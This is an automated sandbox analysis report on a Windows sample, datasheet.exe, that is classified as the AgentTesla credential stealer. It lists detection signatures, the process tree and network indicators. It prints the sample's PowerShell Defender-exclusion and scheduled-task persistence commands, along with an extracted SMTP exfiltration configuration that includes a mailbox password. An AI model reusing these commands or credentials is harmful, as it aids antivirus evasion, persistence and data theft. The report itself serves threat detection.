
Windows Analysis Report
datasheet.exe

Overview

General Information

Sample name: datasheet.exe
Analysis ID: 1559979
MD5: 4c7e7bd9eaf56b3936be87a6904f70f8
SHA1: 22591d29813790d622a1d49a1e0bf91b20235cf6
SHA256: 429e0fa9706ee65774188e538bda0b69a15fb93e97864cedb88e33c650ed9538
Tags: exeuser-lowmal3
Infos:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • datasheet.exe (PID: 2960 cmdline: "C:\Users\user\Desktop\datasheet.exe" MD5: 4C7E7BD9EAF56B3936BE87A6904F70F8)
    • powershell.exe (PID: 3472 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\datasheet.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4924 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 4324 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 6672 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmp8D3A.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7088 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • EhzaIxEFbjyd.exe (PID: 6672 cmdline: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe MD5: 4C7E7BD9EAF56B3936BE87A6904F70F8)
      • schtasks.exe (PID: 7328 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmpA381.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 7336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegSvcs.exe (PID: 7384 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • RegSvcs.exe (PID: 7392 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.yandex.com", "Username": "vladmir@propelind-com.cf", "Password": "marcellinus360"}
Source | Rule | Description | Author | Strings
00000009.00000002.2218212331.00000000031C1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000009.00000002.2218212331.00000000031C1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000009.00000002.2218212331.00000000031EC000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000F.00000002.4606620906.0000000002D81000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000F.00000002.4606620906.0000000002D81000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
Source | Rule | Description | Author | Strings
0.2.datasheet.exe.3d93ea0.2.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.datasheet.exe.3d93ea0.2.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0.2.datasheet.exe.3d93ea0.2.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
  • 0x3321d:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x3328f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x33319:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x333ab:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x33415:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x33487:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x3351d:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x335ad:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
9.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\datasheet.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\datasheet.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\datasheet.exe", ParentImage: C:\Users\user\Desktop\datasheet.exe, ParentProcessId: 2960, ParentProcessName: datasheet.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\datasheet.exe", ProcessId: 3472, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmpA381.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmpA381.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe, ParentImage: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe, ParentProcessId: 6672, ParentProcessName: EhzaIxEFbjyd.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmpA381.tmp", ProcessId: 7328, ProcessName: schtasks.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 77.88.21.158, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7088, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49714
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmp8D3A.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmp8D3A.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\datasheet.exe", ParentImage: C:\Users\user\Desktop\datasheet.exe, ParentProcessId: 2960, ParentProcessName: datasheet.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmp8D3A.tmp", ProcessId: 6672, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\datasheet.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\datasheet.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\datasheet.exe", ParentImage: C:\Users\user\Desktop\datasheet.exe, ParentProcessId: 2960, ParentProcessName: datasheet.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\datasheet.exe", ProcessId: 3472, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmp8D3A.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmp8D3A.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\datasheet.exe", ParentImage: C:\Users\user\Desktop\datasheet.exe, ParentProcessId: 2960, ParentProcessName: datasheet.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmp8D3A.tmp", ProcessId: 6672, ProcessName: schtasks.exe
No Suricata rule has matched

AV Detection

Source: datasheet.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe | Avira: detection malicious, Label: HEUR/AGEN.1305393
Source: 0.2.datasheet.exe.3dd06c0.3.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.yandex.com", "Username": "vladmir@propelind-com.cf", "Password": "marcellinus360"}
Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe | ReversingLabs: Detection: 55%
Source: datasheet.exe | ReversingLabs: Detection: 55%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe | Joe Sandbox ML: detected
Source: datasheet.exe | Joe Sandbox ML: detected
Source: datasheet.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: datasheet.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: Ffsv.pdb source: datasheet.exe, EhzaIxEFbjyd.exe.0.dr
Source: Binary string: Ffsv.pdbSHA256 source: datasheet.exe, EhzaIxEFbjyd.exe.0.dr
Source: C:\Users\user\Desktop\datasheet.exe | Code function: 4x nop then jmp 07C00B7Ah | 0_2_07C0032D
Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe | Code function: 4x nop then jmp 0750FC92h | 11_2_0750F445
Source: global traffic | TCP traffic: 192.168.2.6:49714 -> 77.88.21.158:587
Source: Joe Sandbox View | IP Address: 77.88.21.158 77.88.21.158
Source: Joe Sandbox View | IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: api.ipify.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
Source: global traffic | DNS traffic detected: DNS query: smtp.yandex.com
                    Source: RegSvcs.exe, 0000000F.00000002.4616702168.000000000605E000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616412400.000000000602B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.gl
                    Source: RegSvcs.exe, 0000000F.00000002.4615623153.0000000005F72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsig
                    Source: RegSvcs.exe, 0000000F.00000002.4606620906.000000000316E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616251273.0000000006015000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4615623153.0000000005F72000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4614362804.00000000055D0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4604925690.0000000000E66000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4614478433.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000003041000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002E98000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002E45000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616352892.000000000601F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616702168.000000000605E000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616479784.0000000006046000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsrsaovsslca2018.crl0j
                    Source: RegSvcs.exe, 0000000F.00000002.4606620906.000000000316E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4615623153.0000000005F72000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4614362804.00000000055D0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616102426.0000000005FF5000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4614478433.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4614878043.0000000005653000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000003041000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4615188392.000000000569C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616215912.0000000006011000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002E45000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616672764.000000000605B000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616352892.000000000601F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                    Source: RegSvcs.exe, 0000000F.00000002.4606620906.000000000316E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4615623153.0000000005F72000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4614362804.00000000055D0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616102426.0000000005FF5000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4614478433.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000003041000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4615188392.000000000569C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616215912.0000000006011000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002E45000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616672764.000000000605B000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616352892.000000000601F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616702168.000000000605E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root.crl0G
                    Source: RegSvcs.exe, 0000000F.00000002.4606620906.000000000316E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616251273.0000000006015000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4615623153.0000000005F72000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4614362804.00000000055D0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4604925690.0000000000E66000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4614478433.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000003041000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002E98000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002E45000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616702168.000000000605E000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616479784.0000000006046000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsrsaovsslca20180V
                    Source: RegSvcs.exe, 0000000F.00000002.4606620906.000000000316E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4615623153.0000000005F72000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4614362804.00000000055D0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616102426.0000000005FF5000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4614478433.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000003041000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4615188392.000000000569C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616215912.0000000006011000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002E45000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616672764.000000000605B000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616352892.000000000601F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616702168.000000000605E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/rootr103
                    Source: RegSvcs.exe, 0000000F.00000002.4606620906.000000000316E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4615623153.0000000005F72000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4614362804.00000000055D0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616102426.0000000005FF5000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4614478433.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000003041000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4615188392.000000000569C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616215912.0000000006011000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002E45000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616672764.000000000605B000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616352892.000000000601F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                    Source: datasheet.exe, 00000000.00000002.2187514566.0000000002D75000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2218212331.0000000003171000.00000004.00000800.00020000.00000000.sdmp, EhzaIxEFbjyd.exe, 0000000B.00000002.2236785446.0000000002DD5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002D3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: RegSvcs.exe, 0000000F.00000002.4606620906.000000000316E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616251273.0000000006015000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4615623153.0000000005F72000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4614362804.00000000055D0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4604925690.0000000000E66000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4614478433.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000003041000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002E98000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002E45000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616702168.000000000605E000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616479784.0000000006046000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsrsaovsslca2018.crt07
Source: RegSvcs.exe, 00000009.00000002.2218212331.00000000031EC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.000000000316E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000003041000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000003294000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.000000000322A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://smtp.yandex.com
Source: datasheet.exe, 00000000.00000002.2188466952.0000000003D09000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2213872719.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/
Source: datasheet.exe, 00000000.00000002.2188466952.0000000003D09000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2218212331.0000000003171000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2213872719.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org
Source: RegSvcs.exe, 00000009.00000002.2218212331.0000000003171000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/
